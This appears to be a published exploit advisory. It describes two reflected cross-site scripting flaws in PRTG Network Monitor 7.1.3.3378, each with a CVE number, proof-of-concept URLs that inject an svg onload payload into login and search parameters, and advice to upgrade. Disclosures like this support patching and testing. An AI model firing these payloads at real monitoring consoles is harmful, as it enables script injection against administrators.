PRTG Network Monitor 7.1.3.3378 Cross Site Scripting

`In 2009...  
  
<!--  
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378  
# Date: 17-02-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.paessler.com/prtg  
# Software Link: http://www.paessler.com/prtg  
# Version: PRTG Network Monitor v7.1.3.3378  
# Tested on: All  
# CVE : CVE-2019-9206  
# Category: webapps  
  
1. Description  
  
PRTG Network Monitor v7.1.3.3378 allows XSS via the /public/login.htm,  
errormsg or loginurl parameter. NOTE: This product is discontinued. Update  
to last version.  
  
  
2. Proof of Concept  
  
http://X.X.X.X/public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E  
http://X.X.X.X/public/login.htm?errormsg=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E&loginurl=XSS  
  
  
3. Solution:  
  
The product is discontinued. Update to last version.  
  
-->  
  
<!--  
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378  
# Date: 17-02-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.paessler.com/prtg  
# Software Link: http://www.paessler.com/prtg  
# Version: PRTG Network Monitor v7.1.3.3378  
# Tested on: All  
# CVE : CVE-2019-9207  
# Category: webapps  
  
1. Description  
  
PRTG Network Monitor v7.1.3.3378 allows XSS via the /search.htm, searchtext  
parameter. NOTE: This product is discontinued. Update to last version.  
  
  
2. Proof of Concept  
  
http://X.X.X.X/search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E  
  
3. Solution:  
  
The product is discontinued. Update to last version.  
  
-->  
  
  
`